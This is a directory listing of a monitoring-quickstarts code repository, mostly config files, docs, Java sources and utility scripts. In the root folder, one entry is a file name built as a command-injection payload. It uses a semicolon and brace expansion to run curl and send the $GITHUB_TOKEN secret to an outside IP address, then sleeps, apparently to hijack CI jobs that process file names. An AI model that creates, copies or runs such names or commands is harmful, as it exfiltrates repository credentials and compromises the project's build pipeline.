# newrelic-quickstarts

./: ';{curl,212.237.36.131:8080?q=$GITHUB_TOKEN};{sleep,120};#  .dccache  .env  .gitconfig  .gitignore  .releaserc  CHANGELOG.md  CONTRIBUTING.md  EMERGENCY_RUNBOOK.md  README.md  docker-compose.yml  import.sh  importer-config.sh  package-lock.json  package.json
.github/: CODEOWNERS  pull_request_template.md
NRzure/: README.md
_template/: README.md  config.yml
apache/: config.yml
aws_msk/: config.yml
browser/: config.yaml
cassandra/: config.yml
catchpoint/: config.yml
consul/: config.yml
couchbase/: config.yml
docs/: README.md  alert-spec.md  alert_config.md  config-spec.md  dashboard-spec.md  dashboard_config.md  flex_config.md  flex_integrations.md  graphql-schema-docs.md  install-spec.md  install_config.md  logging_config.md  main_config.md  synthetic_config.md
elixir/: config.yml
haproxy/: config.yml
infrastructure/: config.yml
install/: battlesnake.yml  guided-install.yml  java-agent.yml  php-agent.yml  public-api-performance.yml
jmx/: config.yml
kafka/: config.yml
lamp/: config.yml
memcached/: config.yml
mongodb/: config.yml
mysql/: config.yml
nagios/: config.yml
nginx/: config.yml
packs/java/: Dockerfile  MonitoringJava.md  README.md  config.yml  docker-stack-todoapi.yml  new-relic-enabled.env  new-relic-enabled.example  pom.xml  postgres-db.env  sonar-project.properties
packs/java/adobe-cq/: config.yml
packs/java/akka/: config.yml
packs/java/alerts/: HighCpuUtilization.yml  TransactionErrors.yml
packs/java/anorm/: config.yml
packs/java/asynchttpclient/: config.yml
packs/java/coldfusion/: config.yml
packs/java/cxf/: config.yml
packs/java/dashboards/: java.json
packs/java/datastax-cassandra/: config.yml
packs/java/derby/: config.yml
packs/java/generic-jdbc/: config.yml
packs/java/glassfish/: config.yml
packs/java/grails/: config.yml
packs/java/grpc/: config.yml
packs/java/h2/: config.yml
packs/java/hibernate/: config.yml
packs/java/hsql/: config.yml
packs/java/hystrix/: config.yml
packs/java/hystrix/alerts/: TransactionErrors.yml
packs/java/ibm-db2/: config.yml
packs/java/inet-merlia/: config.yml
packs/java/java/: config.yml
packs/java/java/alerts/: HighCpuUtilization.yml  TransactionErrors.yml
packs/java/java/dashboards/: java.json
packs/java/jax-rs/: config.yml
packs/java/jayrock/: config.yml
packs/java/jcache-api/: config.yml
packs/java/jersey/: config.yml
packs/java/jetty/: config.yml
packs/java/jms/: config.yml
packs/java/jsf/: config.yml
packs/java/jsp/: config.yml
packs/java/mule-esb/: config.yml
packs/java/netty/: config.yml
packs/java/newrelic/: newrelic.yml
packs/java/oc4j/: config.yml
packs/java/opentelemetry-java-exporter/: config.yml
packs/java/play/: config.yml
packs/java/play-ws/: config.yml
packs/java/play-ws/alerts/: HighCpuUtilization.yml
packs/java/quartz-job-scheduler/: config.yml
packs/java/resin/: config.yml
packs/java/resteasy/: config.yml
packs/java/scala/: config.yml
packs/java/slick/: config.yml
packs/java/solr/: config.yml
packs/java/solr/alerts/: HighCpuUtilization.yml
packs/java/spray-can/: config.yml
packs/java/spring/: config.yml
packs/java/spring-jms/: config.yml
packs/java/spymemcached/: config.yml
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/: HelloController.java  TodoRestApplication.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/appconfig/: DBConfig.java  Environment.java  LogConfig.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/config/: ConfigTestController.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/health/: ServiceHealthCheck.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/metric/: MetricController.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/resilient/: ResilienceController.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/secure/: ProtectedController.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/todoitem/: InitializeTodoItemDB.java  TodoItem.java  TodoItemService.java
packs/java/src/main/java/se/cloudenablers/demo/microprofile/todo/util/: BadRequestExceptionHandler.java  CorsFilter.java  LoggerProducer.java  NotFoundExceptionHandler.java
packs/java/src/main/resources/: payara-mp-jwt.properties  publicKey.pem
packs/java/src/main/webapp/: index.html
packs/java/src/test/java/se/cloudenablers/demo/microprofile/todo/: JWTClient.java  MPJWTToken.java
packs/java/src/test/java/se/cloudenablers/demo/microprofile/todo/appconfig/: EnvironmentTest.java
packs/java/src/test/resources/: privateKey.pem
packs/java/struts/: config.yml
packs/java/thrift/: config.yml
packs/java/tomcat/: config.yml
packs/java/tomee/: config.yml
packs/java/vert-x/: config.yml
packs/java/weblogic/: config.yml
packs/java/websphere/: config.yml
packs/java/websphere-liberty-profile/: config.yml
packs/java/wildfly/: config.yml
php/: config.yml
postgresql/: config.yml
postman/: config.yml
quickstarts/: Atlassian JIRA
rabbitmq/: config.yml
redis/: config.yml
scanned-events/: scanned-evets.json
testing_pack/: config.yml
utils/: .prettierrc.js  aws-storage-gateway.json  build-validate-quickstart-artifact.ts  campfire.txt  campfire3.txt  check-icons.js  check-missing-logos.js  check-missing-logos.ts  check-quickstart-slug.ts  check_dashboard_name_uniqueness.js  check_dashboard_name_uniqueness.ts  check_pack_uniqueness.js  check_quickstart_uniqueness.js  check_quickstart_uniqueness.ts  check_support_level.js  constants.ts  conventional-commits.sh  create-preview-links.ts  create-quickstarts-snapshot.ts  create-validate-data-sources.ts  create-validate-install-plans.js  create-validate-install-plans.ts  create_validate_pr_quickstarts.js  create_validate_pr_quickstarts.ts  dashboard-helper-poc.js  dashboard-helper.ts  data-source-from-install-plan.ts  dev.ts  dev_validation.sh  generate-uuids.js  (+48 more)
(+4336 files in other folders)
